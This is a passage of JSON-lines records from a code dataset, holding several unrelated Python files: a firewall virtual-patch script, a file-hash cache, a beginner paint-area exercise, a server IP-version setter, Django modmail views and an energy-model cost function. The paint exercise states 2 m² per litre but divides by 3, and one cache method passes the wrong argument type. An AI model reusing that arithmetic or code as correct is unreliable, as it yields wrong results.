self._create_resource_group(rg_name, rg_components)\n\n # 3. Locate/Create ACL Rule responsible for allowing relevant traffic\n\n # 4. Change the threat policy of the ACL\n\n # 4a. Create TPP\n tpp_name = artifact[\"tpp_name\"]\n tpp_components = {\n \"threats\": threat_rules\n }\n tpp_id = self._create_tpp(tpp_name, tpp_components)\n\n # 4b. Edit Response action of each threat to block\n response_actions = {\n \"block\": True\n }\n is_buld_edit_ok = self._edit_response_actions(tpp_id, response_actions)\n\n # 4c. Compute Malware Policy, URL Filtering Policy\n mp_name = None # \"WithSXCloud\"\n ufp_name = None # \"Default URL Filtering Policy\"\n\n # 4d. Create SPS. Note: URL Filtering and Malware Policies are not defined\n sps_name = artifact[\"sps_name\"]\n sps_components = {\n \"threat_prevention\": tpp_name,\n \"malware\": mp_name,\n \"url_filtering\": ufp_name,\n }\n sps_id = self._create_sps(sps_name, sps_components)\n\n # 4e. Create ACL Rule\n acl_rule_name = artifact[\"acl_rule_name\"]\n acl_rule_components = {\n \"description\": \"Virtual Patch - ACL Rule\",\n \"dst_rg\": rg_id,\n \"sps_id\": sps_id\n }\n is_updated = self._create_acl_rule(acl_rule_name, acl_rule_components)\n\n def check(self, artifact):\n # Check TPP, SPS and ACL Rule\n self.logger.info(\"Check TPP, SPS and ACL Rule.\")\n\n def cleanup(self, artifact):\n # Delete ACL Rule\n self._delete_acl_rule(artifact[\"acl_rule_name\"])\n\n # Delete Resource Group\n self._delete_resource_group(artifact[\"rg_name\"])\n\n # Delete SPS\n self._delete_sps(artifact[\"sps_name\"])\n\n # Delete TPP\n self._delete_tpp(artifact[\"tpp_name\"])\n\nclass PolicyPayload(object):\n def __init__(self):\n pass\n\n def get_tpp_payload(self):\n return {\n \"id\": 0,\n \"isEditable\": \"true\",\n \"tenantId\": 1,\n \"name\": \"dummy\",\n \"rules\": [\n \"dummy\"\n ]\n }\n\n def get_tpp_response_payload(self):\n return {\n \"id\": 0,\n \"responses\": [\n \"dummy\"\n ]\n }\n\n def get_sps_payload(self):\n return {\n \"tenantId\": 1,\n \"id\": 0,\n \"name\": \"dummy\",\n \"accessControlPolicyId\": 0,\n \"isEditable\": \"false\",\n \"isDlpPolicy\": \"false\",\n \"isAnomalyDetection\": \"false\",\n \"malwarePolicyName\": \"null\",\n \"malwarePolicyId\": \"null\",\n \"threatPreventionPolicyName\": \"null\",\n \"threatPreventionPolicyId\": \"null\",\n \"urlfilteringPolicyName\": \"null\",\n \"urlfilteringPolicyId\": \"null\"\n }\n\n def get_rg_payload(self):\n return {\n \"id\": 0,\n \"name\": \"dummy\",\n \"description\": \"dummy\",\n \"purpose\": \"dummy\",\n \"infraIDs\": [],\n \"dynamic\": \"false\",\n \"regex\": \"none\",\n \"resourceType\": \"dummy\",\n \"memberList\": \"dummy\"\n }\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Virtual Patch tool.\")\n parser.add_argument(\"-i\",\"--ipaddress\", help=\"ShieldX - Mgmt. IP Address.\", required=True)\n parser.add_argument(\"-a\",\"--action\", default=\"check\", help=\"Action: patch | check | cleanup\", required=False)\n args = vars(parser.parse_args())\n\n # Take parameters\n ip = args[\"ipaddress\"]\n username = os.environ.get(\"SHIELDX_USER\")\n password = os.environ.get(\"SHIELDX_PASS\")\n action = args[\"action\"]\n\n # Initialize logger\n logger = CustomLogger().get_logger()\n\n if username is None or password is None:\n logger.warning(\"Please set username and password as environment variables.\")\n sys.exit()\n\n # Establish REST connection\n sx_session = SxSession(ip=ip, username=username, password=password)\n sx_session.login()\n\n try:\n # Initialize\n virtual_patch = VirtualPatch(sx_session, logger)\n\n # Artifacts\n artifact = {\n \"rg_name\": \"virtual_patch_rg\",\n \"tpp_name\": \"virtual_patch_tpp\",\n \"sps_name\": \"virtual_patch_sps\",\n \"acl_rule_name\": \"virtual_patch_acl_rule\",\n }\n\n # Proceed based on action\n if action.lower() == \"patch\":\n virtual_patch.patch(artifact)\n elif action.lower() == \"check\":\n virtual_patch.check(artifact)\n elif action.lower() == \"cleanup\":\n virtual_patch.cleanup(artifact)\n else:\n logger.warning(\"Unknown action, {}\".format(action))\n except KeyboardInterrupt as e:\n logger.info(\"Task done. Goodbye.\")\n except Exception as e:\n logger.error(e)\n \n # Logout\n sx_session.logout()\n\n# Sample Run\n# python virtual_patch.py -i 172.16.27.73\n","repo_name":"wantutz/aburame","sub_path":"aburame/shieldxqe/scripts/virtual_patch.py","file_name":"virtual_patch.py","file_ext":"py","file_size_in_byte":13810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"5531129334","text":"import json\nimport os\nfrom typing import Dict, IO, ItemsView, List\n\nfrom .config_base import ConfigBase\nfrom .const import Const\nfrom .file_hash import FileHash\nfrom .hash_base import HashBase\nfrom ..util.overrides_decorator import overrides\n\n\nclass FileHashCache(HashBase):\n\n def __init__(self, path: str, config: ConfigBase):\n self.__setattr__(Const.FIELD_TYPE, self.data_type)\n self.__setattr__(Const.FIELD_VERSION, self.data_version)\n\n self._cache: Dict[str, FileHash] = {}\n self._dirty: bool = False\n self._path: str = path\n self._total_file_size: int = 0\n\n if config is None:\n raise RuntimeError('Config cannot be None')\n self._config = config\n\n # ------------------------------------------------------------------------------------------------------------\n\n @property\n @overrides(HashBase)\n def data_type(self) -> str:\n return Const.KEY_FILE_HASH\n\n @property\n @overrides(HashBase)\n def data_version(self) -> int:\n return 1\n\n # ------------------------------------------------------------------------------------------------------------\n\n # noinspection PyPep8Naming\n @property\n def FILE_HASH_TIME_THRESHOLD_SECONDS(self) -> int:\n return 3\n\n def __len__(self) -> int:\n return len(self._cache)\n\n def __contains__(self, item) -> bool:\n return item in self._cache\n\n def __getitem__(self, path) -> FileHash:\n return self._cache.get(path)\n\n # ------------------------------------------------------------------------------------------------------------\n\n def items(self) -> ItemsView[str, FileHash]:\n return self._cache.items()\n\n # ------------------------------------------------------------------------------------------------------------\n\n @property\n def total_file_size(self) -> int:\n return self._total_file_size\n\n @total_file_size.setter\n def total_file_size(self, val: int) -> None:\n self._total_file_size = val\n\n def get(self, file_name, default_value=None) -> FileHash or None:\n return self._cache.get(file_name, default_value)\n\n # ------------------------------------------------------------------------------------------------------------\n\n def keys(self) -> List[str]:\n return list(self._cache.keys())\n\n # ------------------------------------------------------------------------------------------------------------\n\n def load(self) -> None:\n \"\"\"Loads FileHashes from from flat file storage\n \"\"\"\n if not os.path.isdir(self._path):\n raise NotADirectoryError('\"{name}\" is not a directory'.format(name=self._path))\n\n from .file_hash import FileHash\n\n # if we are forced to rehash all files, then we pretend\n # there was no file to load...\n if self._config.force_rehash:\n self._dirty = True\n return\n\n # we need to prevent dirty state as loading should not affect that flag at all\n dirty = self._dirty\n dot_file_name = os.path.join(self._path, Const.FILE_DOT_DHUNTER)\n\n if os.path.isfile(dot_file_name):\n # is header line read already?\n file_hash_meta_read = False\n\n with open(dot_file_name, 'r') as fh:\n for line in fh:\n line = line.strip('\\n').strip()\n\n if not line or line[0] == '#':\n continue\n\n if not file_hash_meta_read:\n # we need to read cache meta data. For now it is not really needed.\n file_hash_meta_read = True\n continue\n\n filehash = FileHash(line, self._config, dir_path=self._path, no_hash_calc=True)\n if filehash.exists():\n self.add(filehash)\n else:\n from .log import Log\n Log.w('File no longer exists: {}'.format(os.path.join(self._path, filehash.name)))\n dirty = True\n\n self._dirty = dirty\n\n def save(self) -> bool:\n \"\"\"Saves FileHash hashes into flat file storage\n \"\"\"\n if self._config.dont_save_dot_file:\n return True\n\n result = False\n if self._dirty:\n dot_file_name = os.path.join(self._path, Const.FILE_DOT_DHUNTER)\n\n with open(dot_file_name, 'w') as fh:\n fh.write('# {name} hash cache {url}\\n'.format(name=Const.APP_NAME, url=Const.APP_URL))\n self.save_to_fh(fh)\n\n result = True\n\n self._dirty = False\n\n return result\n\n def save_to_fh(self, fh: IO, save_if_non_dirty_too: bool = False) -> bool:\n result = False\n can_save = self._dirty\n\n if not self._dirty and save_if_non_dirty_too:\n can_save = True\n\n if can_save:\n # 1st row is JSON object with data for DirHash\n fh.write('{json}\\n'.format(json=self.to_json()))\n fh.write('\\n')\n\n # all the FileHash objects\n for file_hash in self._cache.values():\n fh.write('{json}\\n'.format(json=file_hash.to_json()))\n\n result = True\n\n return result\n\n # @overrides(HashBase)\n # def _get_json_export_attrs(self) -> List[str]:\n # return [self.data_type_filed_name, self.data_version_field_name]\n\n # ------------------------------------------------------------------------------------------------------------\n\n @overrides(HashBase)\n def to_json(self) -> str:\n attrs = self._get_base_attrs()\n attrs[Const.FIELD_COUNT] = len(self._cache)\n\n return json.dumps(attrs, separators=(',', ':'))\n\n # ------------------------------------------------------------------------------------------------------------\n\n def add(self, file_hash: FileHash) -> None:\n \"\"\"Add FileHash to internal cache storage\n\n :raises ValueError\n \"\"\"\n if not isinstance(file_hash, FileHash):\n raise ValueError('Unsupported data type {type}'.format(type=type(file_hash)))\n\n # check if we have this hash entry in cache already?\n if file_hash not in self._cache.values():\n # no, create new entry then\n self._add_finalize(file_hash)\n elif file_hash.name in self._cache:\n # we do, so let's check if that is for this particular file state\n current_file_hash = self._cache.get(file_hash.name)\n if file_hash != current_file_hash:\n # seems it is not. Most likely underlying data changed,\n # while filename and/or size did not. Need to replace old\n # entry with new one then.\n\n # in case size changed, we need to keep cached totals up to date\n self._total_file_size -= current_file_hash.size\n\n # replace old object\n self.replace(file_hash.name)\n\n # update hash, and totals\n self._add_finalize(file_hash)\n\n def _add_finalize(self, file_hash: FileHash) -> None:\n # force file data hash calculation if not done yet\n if file_hash.hash is None:\n file_hash.calculate_hash()\n\n # store new object in cache\n self._cache[file_hash.name] = file_hash\n\n # update totals\n self._total_file_size += file_hash.size\n\n # flag cache dirty for saving\n self._dirty = True\n\n # if calculation of hash took more than FILE_HASH_TIME_THRESHOLD_SECONDS\n # we force cache file save on adding such hashto avoid re-hashing\n if file_hash.hash_time_seconds >= self.FILE_HASH_TIME_THRESHOLD_SECONDS:\n self.save()\n\n # ------------------------------------------------------------------------------------------------------------\n\n def replace(self, file_hash: FileHash) -> bool:\n \"\"\"Replaces existing FileHash entry with new one or just adds new entry if no file_hash is cached yet.\n :returns indicating if FileHash was replaced (True), or just added (False)\n \"\"\"\n replaced = False\n if file_hash.name in self._cache:\n del self._cache[file_hash.name]\n replaced = True\n\n self.add(file_hash)\n\n return replaced\n\n # ------------------------------------------------------------------------------------------------------------\n\n def remove(self, obj: os.DirEntry or FileHash or str) -> bool:\n \"\"\"Removes cached entry based on of either DirEntry or FileHash data. Does nothing if object is not found\n \"\"\"\n if isinstance(obj, (FileHash, os.DirEntry)):\n return self.remove_by_name(obj.name)\n if isinstance(obj, str):\n return self.remove_by_name(obj)\n\n raise ValueError('Unsupported argument type \"{}\"'.format(type(obj)))\n\n def remove_by_name(self, name: str) -> bool:\n \"\"\"Removes cached file entry based on file name. Does nothing if object is not found\n \"\"\"\n result = False\n if name in self._cache:\n del self._cache[name]\n self._dirty = True\n result = True\n\n return result\n","repo_name":"MarcinOrlowski/dhunter","sub_path":"dhunter/core/file_hash_cache.py","file_name":"file_hash_cache.py","file_ext":"py","file_size_in_byte":9204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23063772057","text":"'''Faça um programa que leia a largura e a altura de uma parede em metros, calcule a sua áreae a quantidade de\ntinta necessária para pintá-la, sabendo que cada litro de tinta pinta uma área de 2 metros quadrados.'''\n\nlargura = float(input(\"Digite a largura da parede: \"))\naltura = float(input(\"Digite a altura da parede: \"))\n\ncalc = largura * altura\n\npintura = calc / 3\n\nprint(f'A parede tem {calc}m²')\nprint(f'Para pintar a parede será necessário(s) {pintura}l de tinta. ')\n","repo_name":"GuilhermeSams/Exercicios-Curso-em-Video","sub_path":"011 Exercício - Pintando Parede.py","file_name":"011 Exercício - Pintando Parede.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16222803336","text":"# -*- coding:utf-8 -*-\n'''\n#==========================================================================\n# @Method: Set IP versions.\n# @command: setdns\n# @Param:\n# @author:\n# @date: 2017.7.21\n#==========================================================================\n'''\nimport sys\n\nFAILURE_MESS = 'Failure: some of the settings failed.\\\n possible causes include the following: '\n\n\ndef setipversion_init(parser, parser_list):\n '''\n #====================================================================================\n # @Method: Register IP protocol commands.\n # @Param: parser, major command argparser\n parser_list, save subcommand parser list\n # @Return:\n # @author:\n #====================================================================================\n '''\n sub_parser = parser.add_parser('setipversion', help='''set IP version''')\n sub_parser.add_argument('-M', dest='IPVersion',\n type=str, required=True, \\\n choices=['IPv4AndIPv6', 'IPv4', 'IPv6'], \\\n help='''whether IPv4/IPv6 protocol is enabled''')\n parser_list['setipversion'] = sub_parser\n\n return 'setipversion'\n\n\ndef package_request(args, payload):\n '''\n #====================================================================================\n # @Method: Encapsulate the request body.\n # @Param:args,payload\n # @Return:\n # @author:\n #====================================================================================\n '''\n huawei = {}\n oem = {}\n huawei[\"IPVersion\"] = args.IPVersion\n oem[\"Huawei\"] = huawei\n payload[\"Oem\"] = oem\n\n\ndef part_err(ck_message):\n '''\n #====================================================================================\n # @Method: 200 messages\n # @Param:idx, ck_message\n # @Return:\n # @date:2017.07.29 16:26\n #====================================================================================\n '''\n idx = 0\n while idx < len(ck_message):\n check_info = ck_message[idx]['Message']\n message = \"%s%s\" % \\\n (check_info[0].lower(), check_info[1:len(check_info) - 1])\n message = message.replace(\"Oem/Huawei/\", \"\")\n print(' %s' % message)\n idx += 1\n\n\ndef all_err(ck_message):\n '''\n #====================================================================================\n # @Method: 400 messages\n # @Param:idx, ck_message\n # @Return:\n # @date:2017.08.29 8:26\n #====================================================================================\n '''\n idx = 0\n while idx < len(ck_message):\n check_info = ck_message[idx]['Message']\n message = \"%s%s\" % \\\n (check_info[0].lower(), check_info[1:len(check_info) - 1])\n message = message.replace(\"Oem/Huawei/\", \"\")\n if idx == 0:\n print('%s' % message)\n else:\n print(' %s' % message)\n idx += 1\n\n\ndef check_err_info(resp_ver, code_ipv):\n '''\n #====================================================================================\n # @Method: Determine whether all attributes are set successfully. Query @Message.ExtendedInf\n # @Param:resp_ver\n # @Return:\n # @author:\n #====================================================================================\n '''\n ck_message = \"\"\n mess_ver = resp_ver.get(\"@Message.ExtendedInfo\", \"\")\n if len(mess_ver) != 0:\n ck_message = resp_ver[\"@Message.ExtendedInfo\"]\n else:\n print('Success: successfully completed request')\n return None\n # Determine whether a permission problem occurs.\n if ck_message[0]['MessageId'] == \\\n \"iBMC.1.0.PropertyModificationNeedPrivilege\" or \\\n ck_message[0]['MessageId'] == \\\n \"Base.1.0.InsufficientPrivilege\":\n print('Failure: you do not have the required' + \\\n ' permissions to perform this operation')\n return None\n # IP version error messages\n if code_ipv == 400:\n sys.stdout.write('Failure: ')\n all_err(ck_message)\n return None\n # Display 200 messages independently.\n if code_ipv == 200:\n print(FAILURE_MESS)\n part_err(ck_message)\n sys.exit(144)\n return resp_ver\n\n\ndef set_version_info(members_uri, client, args):\n '''\n #===========================================================\n # @Method: Set DNS information.\n # @Param:members_uri, client, args\n # @Return:\n # @date: 2017.8.1\n #===========================================================\n '''\n # Encapsulate the request body.\n payload = {}\n package_request(args, payload)\n resp_ver = client.get_resource(members_uri)\n if resp_ver is None:\n return None\n elif resp_ver['status_code'] != 200:\n if resp_ver['status_code'] == 404:\n print('Failure: resource was not found')\n return resp_ver\n resp_ver = client.set_resource(members_uri, payload)\n if resp_ver is None:\n return None\n if resp_ver['status_code'] == 200:\n check_err_info(resp_ver['resource'], resp_ver['status_code'])\n if resp_ver['status_code'] == 400:\n check_err_info(resp_ver['message']['error'], resp_ver['status_code'])\n return resp_ver\n\n\ndef get_port_collection(client, slotid, args):\n '''\n #===========================================================\n # @Method: Query collection information.\n # @Param:client, slotid\n # @Return:\n # @date: 2017.8.1 11:27\n #===========================================================\n '''\n url = \"/redfish/v1/managers/%s/EthernetInterfaces\" % slotid\n resp_ver = client.get_resource(url)\n if resp_ver is None:\n return None\n elif resp_ver['status_code'] != 200:\n if resp_ver['status_code'] == 404:\n print('Failure: resource was not found')\n return resp_ver\n members_count = resp_ver['resource'][\"Members@odata.count\"]\n if members_count == 0:\n print(\"no data available for the resource\")\n return resp_ver\n # Set information.\n else:\n members_uri = resp_ver['resource']['Members'][0][\"@odata.id\"]\n resp_ver = set_version_info(members_uri, client, args)\n return resp_ver\n\n\ndef setipversion(client, parser, args):\n '''\n #===========================================================\n # @Method: setipversion command processing functions\n # @Param:client, parser, args\n # @Return:\n # @date: 2017.8.1\n #===========================================================\n '''\n if args.IPVersion is None:\n parser.error('at least one parameter must be specified')\n slotid = client.get_slotid()\n if slotid is None:\n return None\n # Query collection information.\n ret = get_port_collection(client, slotid, args)\n return ret\n","repo_name":"Huawei/Server_Management_Plugin_Puppet","sub_path":"src/files/REST-Linux/scripts/set_ipversion.py","file_name":"set_ipversion.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"39034030365","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse, HttpResponseForbidden, HttpResponseBadRequest, Http404\nfrom django.views.decorators.http import require_safe, require_POST, require_GET\nfrom django.contrib import auth\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom main.forms import SubredditForm\nfrom main.templatetags.stringify import get_status_class, get_status_label_class, get_status_string\n\nfrom .models import Subreddit, Redditor, Ticket\nfrom .func import reddit_util\n\n@require_safe\ndef index(request):\n\treturn render_main_page(request)\n\n@require_safe\ndef help(request):\n\traise Http404()\n\n@require_safe\ndef subreddit_all(request, subreddit):\n\treturn render_main_page(request, subreddit)\n\n@require_safe\ndef subreddit_open(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.OPEN)\n\n@require_safe\ndef subreddit_active(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.ACTIVE)\n\n@require_safe\ndef subreddit_closed(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.CLOSED)\n\n@require_safe\ndef subreddit_ignored(request, subreddit):\n\treturn render_main_page(request, subreddit, status_filter=Ticket.Status.IGNORED)\n\n@require_safe\ndef subreddit_mine(request, subreddit):\n\treturn render_main_page(request, subreddit, custom_filter=\"mine\")\n\ndef render_main_page(request, subreddit=None, status_filter=None, custom_filter=None, order=None, limit=100):\n\tif subreddit is None:\n\t\treturn render(request, \"main/index.jinja\")\n\t\n\t# Subreddit info\n\tsubreddit = get_subreddit(subreddit)\n\tif subreddit is None:\n\t\treturn render_subreddit_404(request, subreddit)\n\tif not subreddit.user_moderates(request.user) or not subreddit.enabled:\n\t\treturn render_subreddit_401(request, subreddit)\n\t\n\t# Get ticket list\n\tprint(\"Status: {}\".format(status_filter))\n\tif status_filter is not None:\n\t\ttickets = subreddit.get_status_tickets(status_filter)\n\telif custom_filter is not None:\n\t\tif custom_filter == \"mine\":\n\t\t\ttickets = subreddit.get_user_tickets(request.user.redditor)\n\t\telse:\n\t\t\tprint(\"Warning: Invalid custom ticket filter\")\n\t\t\ttickets = subreddit.ticket_set.all()\n\telse:\n\t\ttickets = subreddit.ticket_set.all()\n\t\n\t# Apply modifiers to ticket list\n\ttickets = tickets.order_by(\"-id\" if order is None else order)\n\ttickets = tickets[:limit]\n\t\n\treturn render(request, \"main/subreddit.jinja\", {\"subreddit\": subreddit, \"tickets\": tickets, \"status_filter\": status_filter, \"custom_filter\": custom_filter})\n\n@login_required\ndef subreddit_config(request, subreddit):\n\t# Subreddit info\n\tsubreddit = get_subreddit(subreddit)\n\tif subreddit is None:\n\t\treturn render_subreddit_404(request, subreddit)\n\tif not subreddit.user_moderates(request.user) or not subreddit.enabled:\n\t\treturn render_subreddit_401(request, subreddit)\n\t\n\tif request.method == \"POST\":\n\t\tform = SubredditForm(request.POST, instance=subreddit)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect(\"main:subreddit\", subreddit.name)\n\telse:\n\t\tform = SubredditForm(instance=subreddit)\n\t\treturn render(request, \"main/subreddit_config.jinja\", {\"subreddit\": subreddit, \"form\": form, \"custom_filter\": \"settings\"})\n\n# Authentication\n\ndef logout(request):\n\t#request.session[\"token\"] = None\n\t#request.session.flush()\n\tauth.logout(request)\n\treturn redirect(\"/\")\n\n# Other\n\ndef handler404(request):\n\tresp = render(request, \"main/404.jinja\")\n\tresp.status_code = 404\n\treturn resp\n\n# API methods\n\n@login_required\n@require_POST\ndef modify_ticket(request, ticket_id):\n\tprint(\"Modifying ticket {}\".format(ticket_id))\n\tticket = get_object_or_404(Ticket, id=ticket_id)\n\tif not ticket.subreddit.user_moderates(request.user):\n\t\treturn HttpResponseForbidden()\n\t\n\tdef finalize_success():\n\t\tticket.modified_by = request.user.redditor\n\t\tticket.save()\n\t\n\t# Find and perform the operation\n\tif \"inc_status\" in request.GET:\n\t\tinc_status = request.GET[\"inc_status\"]\n\t\tstatus = Ticket.Status[inc_status.upper()]\n\t\t# Increment the status\n\t\tif status < Ticket.Status.CLOSED:\n\t\t\tstatus += 1\n\t\telse:\n\t\t\treturn JsonResponse({\"success\": False})\n\t\t\n\t\t# Update status\n\t\tticket.status = status\n\t\tfinalize_success()\n\t\t\n\t\treturn JsonResponse({\n\t\t\t\"success\": True,\n\t\t\t\"status\": get_status_class(status),\n\t\t\t\"status_class\": get_status_label_class(status),\n\t\t\t\"status_text\": get_status_string(status)\n\t\t})\n\tif \"set_status\" in request.GET:\n\t\tset_status = request.GET[\"set_status\"]\n\t\tstatus = Ticket.Status[set_status.upper()]\n\t\t\n\t\t# Update status\n\t\tticket.status = status\n\t\tfinalize_success()\n\t\t\n\t\treturn JsonResponse({\n\t\t\t\"success\": True,\n\t\t\t\"status\": get_status_class(status),\n\t\t\t\"status_class\": get_status_label_class(status),\n\t\t\t\"status_text\": get_status_string(status)\n\t\t})\n\tif \"set_flagged\" in request.GET:\n\t\tset_flagged = request.GET[\"set_flagged\"] == \"1\"\n\t\tif (set_flagged and not ticket.is_flagged) or (not set_flagged and ticket.is_flagged):\n\t\t\tticket.is_flagged = set_flagged\n\t\t\tticket.save()\n\t\t\tprint(ticket.is_flagged)\n\t\t\n\t\treturn JsonResponse({\n\t\t\t\"success\": True,\n\t\t\t\"flagged\": set_flagged\n\t\t})\n\t\n\treturn HttpResponseBadRequest()\n\n@login_required\n@require_GET\ndef get_message_body(request, ticket_id):\n\tprint(\"Getting message text {}\".format(ticket_id))\n\tticket = get_object_or_404(Ticket, id=ticket_id)\n\tif not ticket.subreddit.user_moderates(request.user):\n\t\treturn HttpResponseForbidden()\n\t\n\tif ticket.type == Ticket.Type.BAN:\n\t\tmessage = reddit_util.get_message_body_html(request.user, ticket.message.id, offset=1)\n\telse:\n\t\tmessage = reddit_util.get_message_body_html(request.user, ticket.message.id)\n\t\n\tif message:\n\t\treturn JsonResponse({\n\t\t\t\t\"success\": True,\n\t\t\t\t\"message\": message,\n\t\t\t})\n\t\n\treturn JsonResponse({\n\t\t\t\"success\": False\n\t\t})\n\n# Util\n\ndef get_subreddit(subreddit):\n\ttry:\n\t\treturn Subreddit.objects.get(name=subreddit)\n\texcept Subreddit.DoesNotExist:\n\t\treturn None\n\texcept Subreddit.MultipleObjectsReturned:\n\t\tprint(\"This should never happen!\")\n\t\treturn None\n\ndef render_subreddit_404(request, subreddit):\n\treturn render(request, \"main/subreddit_error.jinja\", {\"subreddit\": subreddit, \"error\": \"that subreddit does not exist\"})\n\ndef render_subreddit_401(request, subreddit):\n\treturn render(request, \"main/subreddit_error.jinja\", {\"subreddit\": subreddit, \"error\": \"you are not authorized to view that subreddit\"})\n","repo_name":"TheEnigmaBlade/reddit-modmail-ticketer","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"14729000691","text":"from __future__ import division\n\nfrom temoa_initialize import *\n\n\n##############################################################################\n# Begin *_rule definitions\n\ndef TotalCost_rule(M):\n r\"\"\"\nUsing the :code:`Activity` and :code:`Capacity` variables, the Temoa objective\nfunction calculates the costs associated with supplying the system with energy,\nunder the assumption that all costs are paid for through loans (rather than with\nlump-sum sales). This implementation sums up all the costs incurred by the\nsolution, and is defined as :math:`C_{tot} = C_{loans} + C_{fixed} + C_{variable}`.\nSimilarly, each term on the right-hand side is merely a summation of the costs\nincurred, multiplied by an annual discount factor to calculate the discounted\ncost in year :math:`\\text{P}_0`.\n\n.. math::\n :label: obj_loan\n\n C_{loans} = \\sum_{t, v \\in \\Theta_{IC}} \\left (\n \\left [\n IC_{t, v}\n \\cdot LA_{t, v}\n \\cdot \\frac{(1 + GDR)^{P_0 - v +1} \\cdot (1 - (1 + GDR)^{-{LLN}_{t, v}})}{GDR}\n \\cdot \\frac{ 1-(1+GDR)^{-LPA_{t,v}} }{ 1-(1+GDR)^{-LP_{t,v}} }\n \\right ]\n \\cdot \\textbf{CAP}_{t, v}\n \\right )\n\nNote that we calculate loan costs by using depreciation. If a technology is decommissioned after end of model horizon, then only the amount of the asset cost that is depreciated before end of model horizon will be included in the objective function. We use :math:`\\frac{ 1-(1+GDR)^{-LPA_{t,v}} }{ 1-(1+GDR)^{-LP_{t,v}} }` to calculate the depreciation expense, where :math:`LPA_{t,v}` represents active life time of a process :math:`(t,v)` before end of model horizon.\n\n.. math::\n :label: obj_fixed\n\n C_{fixed} = \\sum_{p, t, v \\in \\Theta_{FC}} \\left (\n \\left [\n FC_{p, t, v}\n \\cdot \\frac{(1 + GDR)^{P_0 - p +1} \\cdot (1 - (1 + GDR)^{-{MPL}_{t, v}})}{GDR}\n \\right ]\n \\cdot \\textbf{CAP}_{t, v}\n \\right )\n\n.. math::\n :label: obj_variable\n\n C_{variable} = \\sum_{p, t, v \\in \\Theta_{VC}} \\left (\n MC_{p, t, v}\n \\cdot\n \\frac{\n (1 + GDR)^{P_0 - p + 1} \\cdot (1 - (1 + GDR)^{-{MPL}_{p,t, v}})\n }{\n GDR\n }\n \\cdot \\textbf{ACT}_{t, v}\n \\right )\n\n\"\"\"\n return sum(PeriodCost_rule(M, p) for p in M.time_optimize)\n\n\ndef PeriodCost_rule(M, p):\n P_0 = min(M.time_optimize)\n P_e = M.time_future.last() # End point of modeled horizon\n GDR = value(M.GlobalDiscountRate)\n MLL = M.ModelLoanLife\n MPL = M.ModelProcessLife\n x = 1 + GDR # convenience variable, nothing more.\n\n loan_costs = sum(\n M.V_Capacity[S_t, S_v]\n * (\n value(M.CostInvest[S_t, S_v])\n * value(M.LoanAnnualize[S_t, S_v])\n * (value(M.LifetimeLoanProcess[S_t, S_v]) if not GDR else\n (x ** (P_0 - S_v + 1) * (1 - x ** (-value(M.LifetimeLoanProcess[S_t, S_v]))) / GDR)\n )\n )\n * (\n (\n 1 - x ** (-min(value(M.LifetimeProcess[S_t, S_v]), P_e - S_v))\n )\n / (\n 1 - x ** (-value(M.LifetimeProcess[S_t, S_v]))\n )\n )\n\n for S_t, S_v in M.CostInvest.sparse_iterkeys()\n if S_v == p\n )\n\n fixed_costs = sum(\n M.V_Capacity[S_t, S_v]\n * (\n\t\t\t\tvalue(M.CostFixed[p, S_t, S_v]) * value(M.FOMIncrease[p, S_t]) # sudan\n\t\t\t\t* (value(MPL[p, S_t, S_v]) if not GDR else\n (x ** (P_0 - p + 1) * (1 - x ** (-value(MPL[p, S_t, S_v]))) / GDR)\n )\n )\n\n for S_p, S_t, S_v in M.CostFixed.sparse_iterkeys()\n if S_p == p\n )\n\n variable_costs = sum(\n M.V_ActivityByPeriodAndProcess[p, S_t, S_v]\n * (\n value(M.CostVariable[p, S_t, S_v])\n * (value(MPL[p, S_t, S_v]) if not GDR else\n (x ** (P_0 - p + 1) * (1 - x ** (-value(MPL[p, S_t, S_v]))) / GDR)\n )\n )\n\n for S_p, S_t, S_v in M.CostVariable.sparse_iterkeys()\n if S_p == p\n )\n\n period_costs = (loan_costs + fixed_costs + variable_costs)\n return period_costs\n\n\n##############################################################################\n# Initializaton rules\n\n\ndef ParamModelLoanLife_rule(M, t, v):\n loan_length = value(M.LifetimeLoanProcess[t, v])\n mll = min(loan_length, max(M.time_future) - v)\n\n return mll\n\n\ndef ParamModelProcessLife_rule(M, p, t, v):\n life_length = value(M.LifetimeProcess[t, v])\n tpl = min(v + life_length - p, value(M.PeriodLength[p]))\n\n return tpl\n\n\ndef ParamPeriodLength(M, p):\n # This specifically does not use time_optimize because this function is\n # called /over/ time_optimize.\n periods = sorted(M.time_future)\n\n i = periods.index(p)\n\n # The +1 won't fail, because this rule is called over time_optimize, which\n # lacks the last period in time_future.\n length = periods[i + 1] - periods[i]\n\n return length\n\n\ndef ParamPeriodRate(M, p):\n \"\"\"\\\nThe \"Period Rate\" is a multiplier against the costs incurred within a period to\nbring the time-value back to the base year. The parameter PeriodRate is not\ndirectly specified by the modeler, but is a convenience calculation based on the\nGlobalDiscountRate and the length of each period. One may refer to this\n(pseudo) parameter via M.PeriodRate[ a_period ]\n\"\"\"\n rate_multiplier = sum(\n (1 + M.GlobalDiscountRate) ** (M.time_optimize.first() - p - y)\n\n for y in range(0, M.PeriodLength[p])\n )\n\n return value(rate_multiplier)\n\n\ndef ParamProcessLifeFraction_rule(M, p, t, v):\n \"\"\"\\\n\nCalculate the fraction of period p that process operates.\n\nFor most processes and periods, this will likely be one, but for any process\nthat will cease operation (rust out, be decommissioned, etc.) between periods,\ncalculate the fraction of the period that the technology is able to\ncreate useful output.\n\"\"\"\n eol_year = v + value(M.LifetimeProcess[t, v])\n frac = eol_year - 